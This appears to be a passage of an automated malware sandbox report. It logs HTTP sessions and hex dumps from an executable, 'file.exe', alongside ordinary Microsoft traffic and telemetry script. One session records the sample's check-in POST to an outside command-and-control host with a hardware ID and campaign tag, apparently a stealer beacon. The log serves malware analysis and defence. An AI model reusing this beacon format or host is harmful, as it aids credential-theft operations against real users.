                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 24490
                                                                                                                                                                                  2024-11-23 13:46:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                  2024-11-23 13:46:30 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  8192.168.2.449743172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:36 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 88
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:36 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=52302B5919819AB7D7CBBD6DF28D3732
                                                                                                                                                                                  2024-11-23 13:46:37 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:36 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=enf8nt65ghfea5bfmonefl0hje; expires=Wed, 19-Mar-2025 07:33:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovlSyKbUfqiPeNEn%2BQ5oDUTHBWTwjgO66eFyc1PnV159hTMSNtUw37zHBGnQH4TJ30HfT0NFjMn0HHPlc4ClLhzOkMCJ3rZg%2FiK1yhIHlh%2FBe8GoDe1xSPCEwnK5UD9%2BYafLY8U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719b3ae96c15bb-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1660034&cwnd=107&unsent_bytes=0&cid=485721748a5efb3a&ts=722&x=0"
                                                                                                                                                                                  2024-11-23 13:46:37 UTC295INData Raw: 31 32 30 0d 0a 56 51 34 79 33 48 6a 4d 4e 4f 30 56 74 54 44 6d 4f 6f 43 30 34 65 6b 54 65 71 30 64 6d 42 66 4f 38 37 4a 69 48 63 77 36 73 4e 59 4f 64 52 43 70 57 76 59 57 68 57 48 42 51 4e 78 6d 72 2b 6a 4f 32 43 74 50 67 79 2b 70 49 75 44 43 67 31 45 7a 2f 51 7a 73 2b 54 70 6f 56 49 42 58 71 46 47 4c 4f 39 42 49 67 78 69 73 6c 6f 65 64 4d 55 43 64 4d 62 70 79 37 4d 6d 44 48 7a 47 33 47 4d 58 30 62 79 78 61 71 41 79 38 44 72 45 36 36 52 2f 58 41 72 57 61 30 39 67 6d 56 4a 77 73 71 7a 6e 2f 78 65 35 4e 62 72 68 66 30 62 73 4a 49 55 43 39 46 71 68 62 67 44 76 51 53 49 4d 59 72 4a 61 48 6e 54 46 41 6e 54 47 36 63 75 7a 4a 67 68 38 78 74 78 6a 46 39 47 38 73 57 71 67 4d 76 41 36 78 4f 75 6b 66 31 51 75 75 67 4e 44 48 49 55 36 5a 4d 36 6b 6d 6b 74 7a 55 43 33
                                                                                                                                                                                  Data Ascii: 120VQ4y3HjMNO0VtTDmOoC04ekTeq0dmBfO87JiHcw6sNYOdRCpWvYWhWHBQNxmr+jO2CtPgy+pIuDCg1Ez/Qzs+TpoVIBXqFGLO9BIgxisloedMUCdMbpy7MmDHzG3GMX0byxaqAy8DrE66R/XArWa09gmVJwsqzn/xe5Nbrhf0bsJIUC9FqhbgDvQSIMYrJaHnTFAnTG6cuzJgh8xtxjF9G8sWqgMvA6xOukf1QuugNDHIU6ZM6kmktzUC3
                                                                                                                                                                                  2024-11-23 13:46:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  9192.168.2.44975923.218.208.109443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                  2024-11-23 13:46:55 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                  X-Ms-Region: prod-eus-z1
                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                  X-OSID: 2
                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                  X-CCC: GB
                                                                                                                                                                                  Cache-Control: public, max-age=243996
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:55 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  10192.168.2.44976623.218.208.109443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                  2024-11-23 13:46:57 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                  Cache-Control: public, max-age=243972
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:57 GMT
                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                  2024-11-23 13:46:57 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  11192.168.2.44976113.107.246.634438176C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:57 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                  Host: js.monitor.azure.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 13:46:58 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:57 GMT
                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                  Content-Length: 207935
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                  Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                  x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  x-azure-ref: 20241123T134657Z-178bfbc474brk967hC1NYCfu60000000048g00000000e4tr
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L2_T2
                                                                                                                                                                                  X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:46:58 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                  Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                  Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                  Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                  Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                  Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                  Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                  Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                  Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                  Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
